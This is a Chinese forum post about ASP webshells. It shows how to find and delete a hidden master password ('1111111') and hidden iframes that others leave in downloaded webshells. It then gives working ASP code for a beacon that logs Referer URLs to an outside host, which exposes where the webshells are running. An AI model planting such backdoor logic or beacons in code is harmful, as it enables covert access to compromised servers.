关于asp木马上留后门的检测和原理

楼主^#

更多发布于：2012-01-30 23:11

[] 1


	去年我讲解过网页木马一系列的语音视频课程不懂的可以去看看视频课程。就在本网站的会员课程下载里面不知道下载的留言解密后先检查有无万能密码，也就是说就算你改了木马的密码，他也能用这个密码来登录正常的： EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 加有万能密码的： EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 1111111就是传说中的万能密码了。找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了！下面来找马大多数都喜欢用框架挂马：<iframe src=后门地址width=0 height=0></iframe> 找到后删了，到此asp后门就算剔除了！下面教大家后门的原理：这是一段收信的asp代码将其保存为1.asp <%url=Request.ServerVariables("HTTP_Referer") set fs=server.CreateObject("Scripting.FileSystemObject") set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True) file.writeline url file.close www.atcpu.com set file=nothing set fs=nothing %> 代码基本意思就是：“HTTP_REFERER” 链接到当前页面的前一页面的URL 地址简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里上传到空间比如http://www.atcpu.com /1.asp 然后里用 <iframe src=http://www.atcpu.com /1.asp width=0 height=0></iframe> 插到asp木马中那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了